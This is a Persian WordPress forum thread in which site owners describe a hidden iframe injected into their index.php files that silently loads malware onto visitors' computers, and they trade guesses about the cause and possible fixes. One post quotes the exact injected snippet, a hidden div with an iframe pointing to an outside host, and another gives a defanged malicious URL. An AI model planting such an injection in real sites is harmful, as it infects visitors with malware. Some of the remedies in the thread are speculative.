ويروس بسيار پيشرفته و فوق العاده خطرناك در WordPress

smahdis

آفلاین
عضو
تعداد نوشته‌ها: ۱۰
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۰۹:۳۹

سلام،
من وردپرس رو نصب كردم بدون هيچ مشكلي. از همين سايت خودتون دانلود و نصب كردم. چند وقت پيش....

اخيرا متوجه شدم كه كامپيوترم ويروسي ميشه. با كمي پيگيري متوجه شدم اين ويروس از سايت خودم مياد. كمي كه تحقيق كردم ديدم يك خط كد اضافي در فايل Index.php گذاشته شده كه يه فايلي رو روي كامپيوتر بازگذاري ميكنه. اسم فايل گاهي عوض ميشه ولي اكثرا يه فايل با نام load.exe يا يه فايل PDF هست. من اسم فايل رو اينطور متوحه شدم كه گاهي اوقات كه وارد سايت ميشدم، دانلود منيجر شروع به دانلود خودكار يه فايل ميكرد كه در اصل نبايد اينطور ميشد بلكه بايد نصب ميشد بدون اينكه كاربر چيزي بفهمه (كه در اكثر مواقع هم ويروس با موفقيت نصب ميشد و هيچ دانلودي اجرا نميشد)

مشكل اينجاست: من وقتي اون كد رو از فايل Index.php برداشتم، درست شد. اما بعد از چند لحظه متوجه شدم دوباره اون كد مياد. تازه فقط تو صفحه index.php نيست! بلكه در صفحه اول مديريت هم اون خط كد در سورسش مشاهده ميشه. بعلاوه توي تمام فالب ها هم اون خط كد هست. من اون خط كد رو دقيقا يادم نمياد، ولي ميدونم <Iframe> داشت (يا يه چيزي تو همين مايه ها).

در داخل اون تگ <frame>، يه لينك به اين سايت بود. فقط لينك رو نگاه كنيد به هيچ عنوان باز نكنيد كه ويروسي ميشيد:

h-t-t-p-://thedeadpit.-c-o-m-/load.php?id=3041508

با فاصله گذاشتم كه كسي باز نكنه. در هر حال، چي كار كنم؟ هر چي اون خط كد رو پاك ميكنم باز هم اون خط مياد.

مشخصات ويروس:

يه ويروس كاملا ناشناخته كه تمامي آنتي ويروس ها رو از كار ميندازه، بعلاوه اگر به اينترنت وصل باشيد، شروع به دانلود فايلهاي ويروس ميكنه.
از مزاياي ديگه اش اينه كه نميذاره هيچ فايل آنتي ويروسي دانلود بشه (و هيچ آنتي ويروسي نصب نميشه).
مشخصات ويروسهايي كه بعد از آلوده شدن سيستم شما به طور خودكار شروع به دانلود ميكنه:

Safe Mode رو از كار ميندازه. گاهي هم باعث ميشه هيچ برنامه اي اجرا نشه (وقتي برنامه اي اجرا ميكني، اون برنامه هي اجرا و هي بسته ميشه، چند بار در هر ثانيه). پر شدن درايو ويندوز. از كار انداختن System Restore و....

ويروس اصلي به هيچ عنوان فابل تشخيص نيست (يعني تو Process ديده نميشه.)

تنها راه تعويض ويندوز هست.

حالا اين ها همه به درك، چطوري از تو سايتم برش دارم و كاري كنم دوباره اون كد تو Index.php ظاهر نشه؟
lib-lord

آفلاین
عضو
تعداد نوشته‌ها: ۱۳۹
تشکر شده: ۱۱ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۱۲:۲۰

بعلاوه توي تمام فالب ها هم اون خط كد هست. من اون خط كد رو دقيقا يادم نمياد، ولي ميدونم <Iframe> داشت (يا يه چيزي تو همين مايه ها).

اینطوری ها هم نیست !‌. حداقل من توی قالب های پیشفرض بسته وردپرس همچین چیزی ندیدم . من خودم قالب روی سایتم رو طراحی کردم و این مشکل رو ندارم، پس مشکل نمی تونه از هسته باشه . شاید مشکل از قالبی باشه که استفاده می کنید . اگر هم قالب ( قالب هایی ) که فرمودین این کد رو در اون ها مشاهده کردین معرفی کنید . بد نیست این طور دوستان بهتر می تونن بررسی کنن
گناهکار

آفلاین
کلیددار
تعداد نوشته‌ها: ۳۵۳۵
تشکر شده: ۲۵۴۵ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۱۳:۳۰

این مشکل هیچ ربطی به وردپرس نداره!

سرویس‌دهنده‌ی هاست شما ویروسی شده و ویروس هم پرونده‌های php رو آلوده می‌کنه. (احتمالن فقط index.phpها). با مدیر سرویس‌دهنده‌ی هاست خود صحبت کنین.
مهدی سالاری

آفلاین
عضو
تعداد نوشته‌ها: ۲۲۹
تشکر شده: ۳۷ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۱۶:۴۳

راستش اینکه سیستم بزرگ وردپرس به ترویج یک ویروس حالا بزرگ یا کوچیک بپردازه به نظر من غیر ممکنه . من فکر می کنم آقای مت و همکارنش اونقدر سر شون شلوغ باشه که وقت برای ساخت ویروس و جاسازیش تو قالب پوسته ها و سیستم وردپرس نداشته باشند .
البته از شما هم تشکر می کنم جناب smahdis به هر حال دادن تذکر و هشدار برای جلوگیری از رخ دادن ایت اتفاق برای دیگران قابل تقدیر هست . این پست شما باعث شد تا منم برم و سیستم رو چک کنم تا ببینم سرور منم ویروس گرفته یا نه . @},- ~O)
iflashlord

آفلاین
عضو
تعداد نوشته‌ها: ۶
تشکر شده: ۲ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۱۹:۵۵

۱۰۰٪ مشکل از قالبه
چون با iframe هستش با برداشتن کد مربوطه مشکل حله - احتمالا توی فایل function.php جاسازی شده باشه که توی اون صفحه بازخوانی بشه
ولی مشکل 100% از هسته ورد پرس نیست
محسن غیاثی

آفلاین
عضو فعال
تعداد نوشته‌ها: ۹۲۷
تشکر شده: ۱۱۰۴ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۲۱:۰۴

Gonahkar گفت:
این مشکل هیچ ربطی به وردپرس نداره!
سرویس‌دهنده‌ی هاست شما ویروسی شده و ویروس هم پرونده‌های php رو آلوده می‌کنه. (احتمالن فقط index.phpها). با مدیر سرویس‌دهنده‌ی هاست خود صحبت کنین.

سلام حرف جناب گناهکار کاملا درسته من سایت دو تا از دوستامو روی دوتا سرور نصب کردم. یکیشون موردی نداشت ولی اون یکی هر هفته کارش همین بود. اگر از فایرفاکس استفاده کنین هشدار میده که سایت ویروسیه.
smahdis

آفلاین
عضو
تعداد نوشته‌ها: ۱۰
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۲۲:۵۸

سلام،
بابا من كه نگفتم مشكل از هسته ورد پرس هست. من كه گفتم اوائل بدون هيچ مشكلي بود. همين هفته پيش اينطوري شده و من فهميدم. قبلا ها اينطوري نبود.

اين نشون ميده كه سايتم هك شده ولي طرف سعي كرده به جاي گذاشتن پيغام مبني بر هك شدن سايت، اومده اين كار رو كرده. در هر حال من الان با هزار زحمت آپگريد كردم به نسخه 2.7 ولي مشكل Encoding دارم. هر كاري هم كه كردم مشكل انكدينگ درست نشد. تو كل گوگل هم گشتم ولي يكي مثل من چنين مشكلي رو داشت كه كسي بهش جواب نداده. از طرفي تو همين انجمن هم گشتم ولي باز هم در اين مورد به پاسخي نرسيدم.

الان ديگه اون ويروسه نيست. ولي مشكل Encoding هست.

http://www.daily-forum.com

لازم نيست بترسيد، ويروسي نداره. چطور اين مشكل جديده رو حل كنم؟
مهدی

آفلاین
ناظم
تعداد نوشته‌ها: ۱۱۰۰
تشکر شده: ۳۴۴ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۲۳:۰۹

اگر اشتباه نکنم برای این مشکل راه حلی تو انجمن هست، داخل انجمن جستجو کنید
smahdis

آفلاین
عضو
تعداد نوشته‌ها: ۱۰
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۲۳:۱۷

خب جستجو كردم ولي به جايي نرسيدم متاسفانه.
مهدی سالاری

آفلاین
عضو
تعداد نوشته‌ها: ۲۲۹
تشکر شده: ۳۷ بار
# نوشته شده: ۱۵ سال پیش
۲۶ آذر ۱۳۸۷ - ۲۳:۴۰

smahdis گفت:
خب جستجو كردم ولي به جايي نرسيدم متاسفانه.

نمی دونم کجا رو گشتید که پیدا نکردید ولی من خودم حتی به کرات شاهد مطرح شدن این موضوع تو انجمن بودم . فکر می کنم این افزونه بتونه مشکل شما رو حل کنه .
امید ک

آفلاین
عضو
تعداد نوشته‌ها: ۲۴
تشکر شده: ۱۸ بار
# نوشته شده: ۱۵ سال پیش
۸ دی ۱۳۸۷ - ۱۶:۲۲

این آقا درست میگن. وردپرس ما هم دقیقا همین مشکل رو پیدا کرد.

در پایین تمام فایل های index.php یک iframe اضافه شد.

کوچکترین ربطی هم به قالب نداره، چون اصلا ربطی به وردپرس نداره. من بعد از تحقیقات گسترده (!) متوجه شدم در تمام سیستم ها این مشکل پیش اومده، از mybb گرفته تا وردپرس و حتی یک فایل ساده ی index.php که کسی نوشته باشه.

مشکل فکر کنم از سرور باشه. راه درمانی هم براش پیدا نکردم متاسفانه.
roohesabz

آفلاین
عضو
تعداد نوشته‌ها: ۸
تشکر شده: ۱ بار
# نوشته شده: ۱۵ سال پیش
۲۲ مهر ۱۳۸۸ - ۰۹:۲۶

سلام خدمت دوستان
برای سایت من هم همچین مشکلی هست
فایل ایندکس سایت و همچنین۲تا وبلاگ زیر مجموعه به این مشکل دچار شدند.
کد اضافه شده برای من این میباشد.
<div style="display:none">envjbnrzqwyfrpfqzoziecjfmvsqvae<iframe width=268 height=200 src="http://bio-a.ru:8080/index.php" ></iframe></div>
به نظر حق با گناهکار باشه.اما اینکه هاست رو چه طوری من میتونم اسکن کنم؟
و اینکه این مشکل اگر هاست اشتراکی باشه میتونه از جای دیگه یا همون اشتراک دیگه اومده باشه؟

البته یه جواب تو جستجو هام دیدم که خوب بود ..میزارم تا ببینید. اینجا
البته من اون خط کد رو برداشتم.حالا هم اجازه دسترسی رو به ۴۴۴ تغییر دادم.ببینم آیا مشکل حل میشه یا نه؟
roohesabz

آفلاین
عضو
تعداد نوشته‌ها: ۸
تشکر شده: ۱ بار
# نوشته شده: ۱۵ سال پیش
۲۳ مهر ۱۳۸۸ - ۱۰:۴۳

باز هم سلام.
نکته : دوستمون فرمودن با آپدیت وردپرس خودشون به ورژن 2.7 مشکل رو حل کردن.من ورژن 2.8.4 رو دارم استفاده میکنم اما مشکل باقیست.
تغییر در دسترسی ایندکس اصلی سایت (نوشته شده با html )منجر به رفع مشکل شد.
ولی تغییر آن در ایندکس وردپرس اصلی باعث مشکل زیر میشود
/** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); ?>
متاسفانه برهم نمیگردد.
یعنی واقعا راهی وجود ندارد که بصورت کوتاه این مشکل رو حل کرد؟
فکر کنم این مشکل میتونه گریبانگیر دیگر دوستان هم بشه پس یه راه حل پیدا کنیم بد نیست.موفق باشید.
یاحق .روح سبز
shahvar

آفلاین
عضو
تعداد نوشته‌ها: ۲۶۶
تشکر شده: ۲۱ بار
# نوشته شده: ۱۵ سال پیش
۲۸ مهر ۱۳۸۸ - ۲۱:۰۲

افزونه Antivirus برای وردپرس رو تست کنید

وردپرس فارسی

انجمن

ويروس بسيار پيشرفته و فوق العاده خطرناك در WordPress (۱۴ نوشته)

درباره‌ی این موضوع

برچسب‌ها